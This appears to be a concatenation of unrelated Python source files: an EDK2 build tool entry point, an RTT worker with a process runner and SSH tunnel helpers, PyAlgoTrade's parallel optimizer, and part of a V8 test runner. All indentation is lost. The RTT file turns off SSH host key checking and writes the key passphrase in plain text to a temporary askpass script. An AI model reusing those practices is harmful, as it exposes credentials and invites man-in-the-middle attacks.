Parser.add_option("-l", "--cmd-len", action="store", type="int", dest="CommandLength", help="Specify the maximum line length of build command. Default is 4096.")
Parser.add_option("--hash", action="store_true", dest="UseHashCache", default=False, help="Enable hash-based caching during build process.")
Parser.add_option("--binary-destination", action="store", type="string", dest="BinCacheDest", help="Generate a cache of binary files in the specified directory.")
Parser.add_option("--binary-source", action="store", type="string", dest="BinCacheSource", help="Consume a cache of binary files from the specified directory.")
Parser.add_option("--genfds-multi-thread", action="store_true", dest="GenfdsMultiThread", default=False, help="Enable GenFds multi thread to generate ffs file.")
(Opt, Args) = Parser.parse_args()
return (Opt, Args)
## Tool entrance method
#
# This method mainly dispatch specific methods per the command line options.
# If no error found, return zero value so the caller of this tool can know
# if it's executed successfully or not.
#
# @retval 0 Tool was successful
# @retval 1 Tool failed
#
def Main():
StartTime = time.time()
# Initialize log system
EdkLogger.Initialize()
GlobalData.gCommand = sys.argv[1:]
#
# Parse the options and args
#
(Option, Target) = MyOptionParser()
GlobalData.gOptions = Option
GlobalData.gCaseInsensitive = Option.CaseInsensitive
# Set log level
if Option.verbose is not None:
EdkLogger.SetLevel(EdkLogger.VERBOSE)
elif Option.quiet is not None:
EdkLogger.SetLevel(EdkLogger.QUIET)
elif Option.debug is not None:
EdkLogger.SetLevel(Option.debug + 1)
else:
EdkLogger.SetLevel(EdkLogger.INFO)
if Option.LogFile is not None:
EdkLogger.SetLogFile(Option.LogFile)
if Option.WarningAsError == True:
EdkLogger.SetWarningAsError()
if platform.platform().find("Windows") >= 0:
GlobalData.gIsWindows = True
else:
GlobalData.gIsWindows = False
EdkLogger.quiet("Build environment: %s" % platform.platform())
EdkLogger.quiet(time.strftime("Build start time: %H:%M:%S, %b.%d %Y\n", time.localtime()));
ReturnCode = 0
MyBuild = None
BuildError = True
try:
if len(Target) == 0:
Target = "all"
elif len(Target) >= 2:
EdkLogger.error("build", OPTION_NOT_SUPPORTED, "More than one targets are not supported.",
ExtraData="Please select one of: %s" % (' '.join(gSupportedTarget)))
else:
Target = Target[0].lower()
if Target not in gSupportedTarget:
EdkLogger.error("build", OPTION_NOT_SUPPORTED, "Not supported target [%s]." % Target,
ExtraData="Please select one of: %s" % (' '.join(gSupportedTarget)))
#
# Check environment variable: EDK_TOOLS_PATH, WORKSPACE, PATH
#
CheckEnvVariable()
GlobalData.gCommandLineDefines.update(ParseDefines(Option.Macros))
Workspace = os.getenv("WORKSPACE")
#
# Get files real name in workspace dir
#
GlobalData.gAllFiles = Utils.DirCache(Workspace)
WorkingDirectory = os.getcwd()
if not Option.ModuleFile:
FileList = glob.glob(os.path.normpath(os.path.join(WorkingDirectory, '*.inf')))
FileNum = len(FileList)
if FileNum >= 2:
EdkLogger.error("build", OPTION_NOT_SUPPORTED, "There are %d INF files in %s." % (FileNum, WorkingDirectory),
ExtraData="Please use '-m <INF_FILE_PATH>' switch to choose one.")
elif FileNum == 1:
Option.ModuleFile = NormFile(FileList[0], Workspace)
if Option.ModuleFile:
if os.path.isabs (Option.ModuleFile):
if os.path.normcase (os.path.normpath(Option.ModuleFile)).find (Workspace) == 0:
Option.ModuleFile = NormFile(os.path.normpath(Option.ModuleFile), Workspace)
Option.ModuleFile = PathClass(Option.ModuleFile, Workspace)
ErrorCode, ErrorInfo = Option.ModuleFile.Validate(".inf", False)
if ErrorCode != 0:
EdkLogger.error("build", ErrorCode, ExtraData=ErrorInfo)
if Option.PlatformFile is not None:
if os.path.isabs (Option.PlatformFile):
if os.path.normcase (os.path.normpath(Option.PlatformFile)).find (Workspace) == 0:
Option.PlatformFile = NormFile(os.path.normpath(Option.PlatformFile), Workspace)
Option.PlatformFile = PathClass(Option.PlatformFile, Workspace)
if Option.FdfFile is not None:
if os.path.isabs (Option.FdfFile):
if os.path.normcase (os.path.normpath(Option.FdfFile)).find (Workspace) == 0:
Option.FdfFile = NormFile(os.path.normpath(Option.FdfFile), Workspace)
Option.FdfFile = PathClass(Option.FdfFile, Workspace)
ErrorCode, ErrorInfo = Option.FdfFile.Validate(".fdf", False)
if ErrorCode != 0:
EdkLogger.error("build", ErrorCode, ExtraData=ErrorInfo)
if Option.Flag is not None and Option.Flag not in ['-c', '-s']:
EdkLogger.error("build", OPTION_VALUE_INVALID, "UNI flag must be one of -c or -s")
MyBuild = Build(Target, Workspace, Option)
GlobalData.gCommandLineDefines['ARCH'] = ' '.join(MyBuild.ArchList)
if not (MyBuild.LaunchPrebuildFlag and os.path.exists(MyBuild.PlatformBuildPath)):
MyBuild.Launch()
#MyBuild.DumpBuildData()
#
# All job done, no error found and no exception raised
#
BuildError = False
except FatalError as X:
if MyBuild is not None:
# for multi-thread build exits safely
MyBuild.Relinquish()
if Option is not None and Option.debug is not None:
EdkLogger.quiet("(Python %s on %s) " % (platform.python_version(), sys.platform) + traceback.format_exc())
ReturnCode = X.args[0]
except Warning as X:
# error from Fdf parser
if MyBuild is not None:
# for multi-thread build exits safely
MyBuild.Relinquish()
if Option is not None and Option.debug is not None:
EdkLogger.quiet("(Python %s on %s) " % (platform.python_version(), sys.platform) + traceback.format_exc())
else:
EdkLogger.error(X.ToolName, FORMAT_INVALID, File=X.FileName, Line=X.LineNumber, ExtraData=X.Message, RaiseError=False)
ReturnCode = FORMAT_INVALID
except KeyboardInterrupt:
ReturnCode = ABORT_ERROR
if Option is not None and Option.debug is not None:
EdkLogger.quiet("(Python %s on %s) " % (platform.python_version(), sys.platform) + traceback.format_exc())
except:
if MyBuild is not None:
# for multi-thread build exits safely
MyBuild.Relinquish()
# try to get the meta-file from the object causing exception
Tb = sys.exc_info()[-1]
MetaFile = GlobalData.gProcessingFile
while Tb is not None:
if 'self' in Tb.tb_frame.f_locals and hasattr(Tb.tb_frame.f_locals['self'], 'MetaFile'):
MetaFile = Tb.tb_frame.f_locals['self'].MetaFile
Tb = Tb.tb_next
EdkLogger.error(
"\nbuild",
CODE_ERROR,
"Unknown fatal error when processing [%s]" % MetaFile,
ExtraData="\n(Please send email to edk2-devel@lists.01.org for help, attaching following call stack trace!)\n",
RaiseError=False
)
EdkLogger.quiet("(Python %s on %s) " % (platform.python_version(), sys.platform) + traceback.format_exc())
ReturnCode = CODE_ERROR
finally:
Utils.Progressor.Abort()
Utils.ClearDuplicatedInf()
if ReturnCode == 0:
try:
MyBuild.LaunchPostbuild()
Conclusion = "Done"
except:
Conclusion = "Failed"
elif ReturnCode == ABORT_ERROR:
Conclusion = "Aborted"
else:
Conclusion = "Failed"
FinishTime = time.time()
BuildDuration = time.gmtime(int(round(FinishTime - StartTime)))
BuildDurationStr = ""
if BuildDuration.tm_yday > 1:
BuildDurationStr = time.strftime("%H:%M:%S", BuildDuration) + ", %d day(s)" % (BuildDuration.tm_yday - 1)
else:
BuildDurationStr = time.strftime("%H:%M:%S", BuildDuration)
if MyBuild is not None:
if not BuildError:
MyBuild.BuildReport.GenerateReport(BuildDurationStr, LogBuildTime(MyBuild.AutoGenTime), LogBuildTime(MyBuild.MakeTime), LogBuildTime(MyBuild.GenFdsTime))
EdkLogger.SetLevel(EdkLogger.QUIET)
EdkLogger.quiet("\n- %s -" % Conclusion)
EdkLogger.quiet(time.strftime("Build end time: %H:%M:%S, %b.%d %Y", time.localtime()))
EdkLogger.quiet("Build total time: %s\n" % BuildDurationStr)
return ReturnCode
if __name__ == '__main__':
r = Main()
## 0-127 is a safe return range, and 1 is a standard default error
if r < 0 or r > 127: r = 1
sys.exit(r)
|
rtt_worker.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Author: Dusan Klinec, ph4r05, 2018
# pip install shellescape sarge
import logging
import signal
import threading
import time
import sys
import os
import random
import socket
import typing
import shutil
import tempfile
import paramiko
import sshtunnel
from shlex import quote
import shellescape
from sarge import Capture, Feeder, run
from . import rtt_sftp_conn
from . import rtt_utils
logger = logging.getLogger(__name__)
SARGE_FILTER_INSTALLED = False
RTT_BATTERIES = {
'Dieharder': 'dieharder',
'NIST Statistical Testing Suite': 'nist_sts',
'TestU01 Alphabit': 'tu01_alphabit',
'TestU01 Block Alphabit': 'tu01_blockalphabit',
'TestU01 Crush': 'tu01_crush',
'TestU01 Rabbit': 'tu01_rabbit',
'TestU01 Small Crush': 'tu01_smallcrush',
}
def job_battery_to_experiment(bat):
for keys in RTT_BATTERIES:
if RTT_BATTERIES[keys] == bat:
return keys
raise ValueError('Key not found: %s' % bat)
def experiment_battery_to_job(bat):
return RTT_BATTERIES[bat]
def try_fnc(fnc):
try:
return fnc()
except:
pass
class SargeLogFilter(logging.Filter):
"""Filters out debugging logs generated by sarge - output capture. It is way too verbose for debug"""
def __init__(self, name="", *args, **kwargs):
self.namex = name
logging.Filter.__init__(self, *args, **kwargs)
def filter(self, record):
if record.levelno != logging.DEBUG:
return 1
try:
# Parse messages are too verbose, skip.
if record.name == "sarge.parse":
return 0
# Disable output processing message - length of one character.
msg = record.getMessage()
if "queued chunk of length 1" in msg:
return 0
return 1
except Exception as e:
logger.error("Exception in log filtering: %s" % (e,), exc_info=e)
return 1
def install_sarge_filter():
"""
Installs Sarge log filter to avoid long 1char debug dumps
:return:
"""
global SARGE_FILTER_INSTALLED
if SARGE_FILTER_INSTALLED:
return
for handler in logging.getLogger().handlers:
handler.addFilter(SargeLogFilter("hnd"))
logging.getLogger().addFilter(SargeLogFilter("root"))
SARGE_FILTER_INSTALLED = True
def sarge_sigint(proc, sig=signal.SIGTERM):
"""
Sends sigint to sarge process
:return:
"""
proc.process_ready.wait()
p = proc.process
if not p: # pragma: no cover
raise ValueError("There is no subprocess")
p.send_signal(sig)
def escape_shell(inp):
"""
Shell-escapes input param
:param inp:
:return:
"""
try:
inp = inp.decode("utf8")
except:
pass
try:
return shellescape.quote(inp)
except:
pass
quote(inp)
class AsyncRunner:
def __init__(self, cmd, args=None, stdout=None, stderr=None, cwd=None, shell=True, env=None):
self.cmd = cmd
self.args = args
self.on_finished = None
self.on_output = None
self.on_tick = None
self.no_log_just_write = False
self.log_out_during = True
self.log_out_after = True
self.stdout = stdout
self.stderr = stderr
self.cwd = cwd
self.shell = shell
self.env = env
self.preexec_setgrp = False
self.using_stdout_cap = True
self.using_stderr_cap = True
self.ret_code = None
self.out_acc = []
self.err_acc = []
self.feeder = None
self.proc = None
self.is_running = False
self.was_running = False
self.terminating = False
self.thread = None
def run(self):
try:
self.run_internal()
except Exception as e:
self.is_running = False
logger.error("Unexpected exception in runner: %s" % (e,), exc_info=e)
finally:
self.was_running = True
def __del__(self):
self.deinit()
def deinit(self):
rtt_utils.try_fnc(lambda: self.feeder.close())
if not self.proc:
return
if self.using_stdout_cap:
rtt_utils.try_fnc(lambda: self.proc.stdout.close())
if self.using_stderr_cap:
rtt_utils.try_fnc(lambda: self.proc.stderr.close())
rtt_utils.try_fnc(lambda: self.proc.close())
def drain_stream(self, s, block=False, timeout=0.15):
ret = []
while True:
rs = s.read(-1, block, timeout)
if not rs:
break
ret.append(rs)
return ret
def run_internal(self):
def preexec_function():
os.setpgrp()
cmd = self.cmd
if self.shell:
args_str = (
" ".join(self.args) if isinstance(self.args, (list, tuple)) else self.args
)
if isinstance(cmd, (list, tuple)):
cmd = " ".join(cmd)
if args_str and len(args_str) > 0:
cmd += " " + args_str
else:
if self.args and not isinstance(self.args, (list, tuple)):
raise ValueError("!Shell requires array of args")
if self.args:
cmd += self.args
self.using_stdout_cap = self.stdout is None
self.using_stderr_cap = self.stderr is None
self.feeder = Feeder()
logger.debug("Starting command %s in %s" % (cmd, self.cwd))
run_args = {}
if self.preexec_setgrp:
run_args['preexec_fn'] = preexec_function
p = run(
cmd,
input=self.feeder,
async_=True,
stdout=self.stdout or Capture(timeout=0.1, buffer_size=1),
stderr=self.stderr or Capture(timeout=0.1, buffer_size=1),
cwd=self.cwd,
env=self.env,
shell=self.shell,
**run_args
)
self.proc = p
self.ret_code = 1
self.out_acc, self.err_acc = [], []
out_cur, err_cur = [""], [""]
def process_line(line, is_err=False):
dst = self.err_acc if is_err else self.out_acc
dst.append(line)
if self.log_out_during:
if self.no_log_just_write:
dv = sys.stderr if is_err else sys.stdout
dv.write(line + "\n")
dv.flush()
else:
logger.debug("Out: %s" % line.strip())
if self.on_output:
self.on_output(self, line, is_err)
def add_output(buffers, is_err=False, finish=False):
buffers = [x.decode("utf8") for x in buffers if x is not None and x != ""]
lines = [""]
if not buffers and not finish:
return
dst_cur = err_cur if is_err else out_cur
for x in buffers:
clines = [v.strip("\r") for v in x.split("\n")]
lines[-1] += clines[0]
lines.extend(clines[1:])
nlines = len(lines)
dst_cur[0] += lines[0]
if nlines > 1:
process_line(dst_cur[0], is_err)
dst_cur[0] = ""
for line in lines[1:-1]:
process_line(line, is_err)
if not finish and nlines > 1:
dst_cur[0] = lines[-1] or ""
if finish:
cline = dst_cur[0] if nlines == 1 else lines[-1]
if cline:
process_line(cline, is_err)
try:
while len(p.commands) == 0:
time.sleep(0.15)
logger.debug("Program started, progs: %s" % len(p.commands))
if p.commands[0] is None:
self.is_running = False
self.was_running = True
logger.error("Program could not be started")
return
self.is_running = True
self.on_change()
out = None
err = None
while p.commands[0] and p.commands[0].returncode is None:
if self.using_stdout_cap:
out = p.stdout.read(-1, False)
add_output([out], is_err=False)
if self.using_stderr_cap:
err = p.stderr.read(-1, False)
add_output([err], is_err=True)
if self.on_tick:
self.on_tick(self)
p.commands[0].poll()
if self.terminating and p.commands[0].returncode is None:
logger.debug("Terminating by sigint %s" % p.commands[0])
sarge_sigint(p.commands[0], signal.SIGTERM)
sarge_sigint(p.commands[0], signal.SIGINT)
logger.debug("Sigint sent")
logger.debug("Process closed")
# If there is data, consume it right away.
if (self.using_stdout_cap and out) or (self.using_stderr_cap and err):
continue
time.sleep(0.15)
logger.debug("Runner while ended")
p.wait()
self.ret_code = p.commands[0].returncode if p.commands[0] else -1
if self.using_stdout_cap:
try_fnc(lambda: p.stdout.close())
add_output(self.drain_stream(p.stdout, True), finish=True)
if self.using_stderr_cap:
try_fnc(lambda: p.stderr.close())
add_output(self.drain_stream(p.stderr, True), is_err=True, finish=True)
self.was_running = True
self.is_running = False
self.on_change()
logger.debug("Program ended with code: %s" % self.ret_code)
logger.debug("Command: %s" % cmd)
if self.log_out_after:
logger.debug("Std out: %s" % "\n".join(self.out_acc))
logger.debug("Error out: %s" % "\n".join(self.err_acc))
except Exception as e:
self.is_running = False
logger.error("Exception in async runner: %s" % (e,))
finally:
self.was_running = True
rtt_utils.try_fnc(lambda: self.feeder.close())
rtt_utils.try_fnc(lambda: self.proc.close())
if self.on_finished:
self.on_finished(self)
def on_change(self):
pass
def shutdown(self):
if not self.is_running:
return
self.terminating = True
time.sleep(1)
# Terminating with sigint
logger.info("Waiting for program to terminate...")
while self.is_running:
time.sleep(0.1)
logger.info("Program terminated")
self.deinit()
def start(self):
install_sarge_filter()
self.thread = threading.Thread(target=self.run, args=())
self.thread.setDaemon(False)
self.thread.start()
self.terminating = False
self.is_running = False
while not self.is_running and not self.was_running:
time.sleep(0.1)
return self
def get_rtt_runner(rtt_args, cwd=None):
rtt_env = {'LD_LIBRARY_PATH': rtt_utils.extend_lib_path(cwd)}
async_runner = AsyncRunner(rtt_args, cwd=cwd, shell=False, env=rtt_env)
async_runner.log_out_after = False
async_runner.preexec_setgrp = True
return async_runner
def get_booltest_rtt_runner(rtt_args, cwd=None):
async_runner = AsyncRunner(rtt_args, cwd=cwd, shell=False)
async_runner.log_out_after = False
async_runner.preexec_setgrp = True
return async_runner
class SSHForwarder:
def __init__(self, ssh_params: rtt_sftp_conn.SSHParams, remote_server: str, remote_port: int, local_port=None):
self.ssh_params = ssh_params
self.remote_server = remote_server
self.remote_port = remote_port
self.local_port = local_port
def start(self):
raise ValueError('Not implemented')
def shutdown(self):
raise ValueError('Not implemented')
class SSHForwarderPython(SSHForwarder):
def __init__(self, ssh_params: rtt_sftp_conn.SSHParams, remote_server: str, remote_port: int, local_port=None):
super().__init__(ssh_params, remote_server, remote_port, local_port)
self.is_running = False
self.terminating = False
self.thread = None
def run(self):
logger.info("Establishing SSH tunnel...")
local_args = {} if not self.local_port else {'local_bind_address': ('0.0.0.0', self.local_port)}
with sshtunnel.open_tunnel(
(self.ssh_params.host, self.ssh_params.port),
ssh_username=self.ssh_params.user,
ssh_pkey=self.ssh_params.pkey_file,
ssh_private_key_password=self.ssh_params.pkey_pass,
remote_bind_address=(self.remote_server, self.remote_port),
**local_args
) as tunnel:
self.local_port = tunnel.local_bind_port
self.is_running = True
logger.info("SSH tunnel established, port: %s" % self.local_port)
while not self.terminating:
time.sleep(0.5)
self.is_running = False
logger.info("Closing SSH tunnel")
def start(self):
self.thread = threading.Thread(target=self.run, args=())
self.thread.setDaemon(False)
self.thread.start()
self.terminating = False
self.is_running = False
while not self.is_running:
time.sleep(0.1)
return self
def shutdown(self):
if not self.is_running:
return
self.terminating = True
time.sleep(1)
# Terminating with sigint
logger.info("Waiting for ssh tunnel to terminate...")
while self.is_running:
time.sleep(0.1)
def bind_random_port():
for _ in range(5000):
port = random.randrange(20000, 65535)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
s.bind(('127.0.0.1', port))
return s, port
except socket.error as e:
s.close()
raise ValueError('Binding took too long')
def try_to_connect(host, port, timeout=15):
tstart = time.time()
while True:
if time.time() - tstart > timeout:
raise ValueError('Could not connect in time')
s = socket.socket()
s.settimeout(5)
try:
s.connect((host, port))
return s
except socket.error as exc:
time.sleep(0.1)
continue
class SSHForwarderLinux(SSHForwarder):
def __init__(self, ssh_params: rtt_sftp_conn.SSHParams, remote_server: str, remote_port: int, local_port=None):
super().__init__(ssh_params, remote_server, remote_port, local_port)
self.on_bind_error = None
self.do_setsid = True
self.reservation_socket = None
self.runner = None # type: typing.Optional[AsyncRunner]
self.ssh_passwd_asked = False
self.ssh_passwd_entered = False
self.bind_error = False
self.ask_pass_path = None
self.first_tick = None
self.script_path = None
self.pid_path = None
def __del__(self):
logger.info("SSH shutdown on delete (dirty)")
self.shutdown()
def create_runner(self):
if self.local_port is None:
self.reservation_socket, self.local_port = bind_random_port()
logger.info("Reserving random local port: %s" % self.local_port)
args = [
'-i', '\'%s\'' % self.ssh_params.pkey_file,
'-L', '%s:%s:%s' % (self.local_port, self.remote_server, self.remote_port),
'-N',
'-oLogLevel=error',
'-oStrictHostKeyChecking=no',
'-oUserKnownHostsFile=/dev/null',
'-o ConnectTimeout=30',
'-p', '%s' % self.ssh_params.port,
'\'%s\'@%s' % (self.ssh_params.user, self.ssh_params.host),
]
args_str = ' '.join(args)
cmd = 'ssh %s' % args_str
if self.do_setsid:
self.create_shell_run_script(cmd)
cmd = 'setsid bash %s' % self.script_path
env = {
'DISPLAY': ':0',
'SSH_ASKPASS': self.ask_pass_path
}
logger.info("Creating runner with: %s, env: %s" % (cmd, env))
self.runner = AsyncRunner(cmd, shell=True, env=env)
self.runner.on_output = self.on_ssh_line
self.runner.on_tick = self.on_ssh_tick
self.runner.on_finished = self.on_ssh_finish
def on_ssh_line(self, runner, line: str, is_error):
low = line.lower().strip()
if low.startswith('enter pass'):
self.ssh_passwd_asked = True
if low.startswith('bind: address al'):
self.bind_error = True
if self.on_bind_error:
self.on_bind_error()
def on_ssh_tick(self, runner):
if not self.first_tick:
self.first_tick = time.time()
if time.time() - self.first_tick > 10:
self.try_delete_shell_script()
if self.ssh_passwd_asked and not self.ssh_passwd_entered:
self.runner.feeder.feed(self.ssh_params.pkey_pass)
self.runner.feeder.feed("\n")
self.ssh_passwd_entered = True
logger.info("Key password entered")
def on_ssh_finish(self, runner):
logger.info("SSH tunnel finished")
self.try_delete_shell_script()
def create_shell_run_script(self, cmd):
old_mask = os.umask(0)
temp = tempfile.NamedTemporaryFile()
self.script_path = temp.name
temp.close()
temp = tempfile.NamedTemporaryFile()
self.pid_path = temp.name
temp.close()
logger.info('Creating SSH run script: %s, pid file: %s, cmd: %s'
% (self.script_path, self.pid_path, cmd))
with open(os.open(self.script_path, os.O_CREAT | os.O_WRONLY, 0o700), 'w') as fh:
fh.write('#!/bin/bash\n')
fh.write('%s &\n' % cmd)
fh.write('echo $! > %s\n' % self.pid_path)
os.umask(old_mask)
def create_shell_script(self):
old_mask = os.umask(0)
temp = tempfile.NamedTemporaryFile()
self.ask_pass_path = temp.name
temp.close()
logger.info('Creating SSH ask script: %s' % self.ask_pass_path)
with open(os.open(self.ask_pass_path, os.O_CREAT | os.O_WRONLY, 0o700), 'w') as fh:
fh.write('#!/bin/bash\n')
fh.write('echo "%s"\n' % self.ssh_params.pkey_pass)
fh.write('/bin/rm "%s" >/dev/null 2>/dev/null\n' % self.ask_pass_path)
os.umask(old_mask)
def try_delete_shell_script(self):
try:
if self.ask_pass_path and os.path.exists(self.ask_pass_path):
logger.info("Deleting ASK pass script %s" % self.ask_pass_path)
os.unlink(self.ask_pass_path)
self.ask_pass_path = None
except:
pass
def start(self):
self.create_shell_script()
self.create_runner()
if self.reservation_socket:
self.reservation_socket.close()
logger.info("Reservation socket closed, race begins...")
self.runner.start()
# Connection test
try:
logger.info("SSH started, waiting for port availability")
s = try_to_connect('127.0.0.1', self.local_port, 60)
s.close()
time.sleep(1)
except Exception as e:
logger.error('Could not start SSH port forwarding in the given time limit, aborting execution')
self.runner.shutdown()
raise ValueError('Could not start SSH tunneling')
def shutdown(self):
logger.info("Shutting down SSH forwarder")
if self.pid_path:
logger.info("PID file found %s, trying to terminate..." % self.pid_path)
try:
pid = None
with open(self.pid_path) as fh:
pid = int(fh.read().strip())
logger.info("Sending SIGTERM to PID %s" % pid)
os.kill(pid, signal.SIGTERM)
time.sleep(2)
except Exception as e:
logger.error("Exception when terminating running ssh %s" % (e,), exc_info=e)
logger.info("SSH runner shutdown")
self.runner.shutdown()
logger.info("SSH runner cleanup")
rtt_utils.try_remove(self.pid_path)
rtt_utils.try_remove(self.script_path)
rtt_utils.try_remove(self.ask_pass_path)
self.pid_path = None
self.script_path = None
self.ask_pass_path = None
logger.info("SSH Shutdown finished")
def create_experiments_dir(basedir):
os.makedirs(basedir, 0o771, True)
d1 = ["AlgorithmTesting",
"BBS",
"CCG",
"G-SHA1",
"LCG",
"MODEXP",
"MS",
"QCG1",
"QCG2",
"XOR",
]
d2 = ["Frequency",
"BlockFrequency",
"Runs",
"LongestRun",
"Rank",
"FFT",
"NonOverlappingTemplate",
"OverlappingTemplate",
"Universal",
"LinearComplexity",
"Serial",
"ApproximateEntropy",
"CumulativeSums",
"RandomExcursions",
"RandomExcursionsVariant",
]
for cd in d1:
cdfull = os.path.join(basedir, "experiments", cd)
os.makedirs(cdfull, 0o771, True)
for cd2 in d2:
cd2full = os.path.join(cdfull, cd2)
os.makedirs(cd2full, 0o771, True)
def copy_templates_dir(basedir, target):
src = os.path.join(basedir, "templates")
dst = os.path.join(target, "templates")
try:
shutil.rmtree(dst, True)
return shutil.copytree(src, dst)
except Exception as e:
logger.error("Exception in copying template dir: %s" % (e,), exc_info=e)
raise
|
local.py
|
# PyAlgoTrade
#
# Copyright 2011-2015 Gabriel Martin Becedillas Ruiz
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
.. moduleauthor:: Gabriel Martin Becedillas Ruiz <gabriel.becedillas@gmail.com>
"""
import multiprocessing
import threading
import logging
import socket
import random
import os
from pyalgotrade.optimizer import server
from pyalgotrade.optimizer import worker
class ServerThread(threading.Thread):
def __init__(self, server, barFeed, strategyParameters):
super(ServerThread, self).__init__()
self.__server = server
self.__barFeed = barFeed
self.__strategyParameters = strategyParameters
self.__results = None
def getResults(self):
return self.__results
def run(self):
self.__results = self.__server.serve(self.__barFeed, self.__strategyParameters)
def worker_process(strategyClass, port):
class Worker(worker.Worker):
def runStrategy(self, barFeed, *args, **kwargs):
strat = strategyClass(barFeed, *args, **kwargs)
strat.run()
return strat.getResult()
# Create a worker and run it.
name = "worker-%s" % (os.getpid())
w = Worker("localhost", port, name)
w.getLogger().setLevel(logging.ERROR)
w.run()
def find_port():
while True:
ret = random.randint(1025, 65536)
try:
s = socket.socket()
s.bind(("localhost", ret))
s.close()
return ret
except socket.error:
pass
def run(strategyClass, barFeed, strategyParameters, workerCount=None):
"""Executes many instances of a strategy in parallel and finds the parameters that yield the best results.
:param strategyClass: The strategy class.
:param barFeed: The bar feed to use to backtest the strategy.
:type barFeed: :class:`pyalgotrade.barfeed.BarFeed`.
:param strategyParameters: The set of parameters to use for backtesting. An iterable object where **each element is a tuple that holds parameter values**.
:param workerCount: The number of strategies to run in parallel. If None then as many workers as CPUs are used.
:type workerCount: int.
:rtype: A :class:`Results` instance with the best results found.
"""
assert(workerCount is None or workerCount > 0)
if workerCount is None:
workerCount = multiprocessing.cpu_count()
ret = None
workers = []
port = find_port()
if port is None:
raise Exception("Failed to find a port to listen")
# Build and start the server thread before the worker processes. We'll manually stop the server once workers have finished.
srv = server.Server("localhost", port, False)
serverThread = ServerThread(srv, barFeed, strategyParameters)
serverThread.start()
try:
# Build the worker processes.
for i in range(workerCount):
workers.append(multiprocessing.Process(target=worker_process, args=(strategyClass, port)))
# Start workers
for process in workers:
process.start()
# Wait workers
for process in workers:
process.join()
finally:
# Stop and wait the server to finish.
srv.stop()
serverThread.join()
ret = serverThread.getResults()
return ret
|
test.py
|
#!/usr/bin/env python
#
# Copyright 2008 the V8 project authors. All rights reserved.
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided
# with the distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived
# from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
import imp
import optparse
import os
import platform
import re
import signal
import subprocess
import sys
import tempfile
import time
import threading
from os.path import join, dirname, abspath, basename, isdir, exists
from datetime import datetime
from Queue import Queue, Empty
sys.path.append(dirname(__file__) + "/../deps/v8/tools");
import utils
VERBOSE = False
NO_TRUNCATE = False
# ---------------------------------------------
# --- P r o g r e s s I n d i c a t o r s ---
# ---------------------------------------------
class ProgressIndicator(object):
def __init__(self, cases):
self.cases = cases
self.queue = Queue(len(cases))
for case in cases:
self.queue.put_nowait(case)
self.succeeded = 0
self.remaining = len(cases)
self.total = len(cases)
self.failed = [ ]
self.crashed = 0
self.terminate = False
self.lock = threading.Lock()
def PrintFailureHeader(self, test):
if test.IsNegative():
negative_marker = '[negative] '
else:
negative_marker = ''
print "=== %(label)s %(negative)s===" % {
'label': test.GetLabel(),
'negative': negative_marker
}
print "Path: %s" % "/".join(test.path)
def Run(self, tasks):
self.Starting()
threads = []
# Spawn N-1 threads and then use this thread as the last one.
# That way -j1 avoids threading altogether which is a nice fallback
# in case of threading problems.
for i in xrange(tasks - 1):
thread = threading.Thread(target=self.RunSingle, args=[])
threads.append(thread)
thread.start()
try:
self.RunSingle()
# Wait for the remaining threads
for thread in threads:
# Use a timeout so that signals (ctrl-c) will be processed.
thread.join(timeout=10000000)
except Exception, e:
# If there's an exception we schedule an interruption for any
# remaining threads.
self.terminate = True
# ...and then reraise the exception to bail out
raise
self.Done()
return not self.failed
def RunSingle(self):
while not self.terminate:
try:
test = self.queue.get_nowait()
except Empty:
return
case = test.case
self.lock.acquire()
self.AboutToRun(case)
self.lock.release()
try:
start = datetime.now()
output = case.Run()
case.duration = (datetime.now() - start)
except IOError, e:
assert self.terminate
return
if self.terminate:
return
self.lock.acquire()
if output.UnexpectedOutput():
self.failed.append(output)
if output.HasCrashed():
self.crashed += 1
else:
self.succeeded += 1
self.remaining -= 1
self.HasRun(output)
self.lock.release()
def EscapeCommand(command):
parts = []
for part in command:
if ' ' in part:
# Escape spaces. We may need to escape more characters for this
# to work properly.
parts.append('"%s"' % part)
else:
parts.append(part)
return " ".join(parts)
class SimpleProgressIndicator(ProgressIndicator):
def Starting(self):
print 'Running %i tests' % len(self.cases)
def Done(self):
print
for failed in self.failed:
self.PrintFailureHeader(failed.test)
if failed.output.stderr:
print "--- stderr ---"
print failed.output.stderr.strip()
if failed.output.stdout:
print "--- stdout ---"
print failed.output.stdout.strip()
print "Command: %s" % EscapeCommand(failed.command)
if failed.HasCrashed():
print "--- CRASHED ---"
if failed.HasTimedOut():
print "--- TIMEOUT ---"
if len(self.failed) == 0:
print "==="
print "=== All tests succeeded"
print "==="
else:
print
print "==="
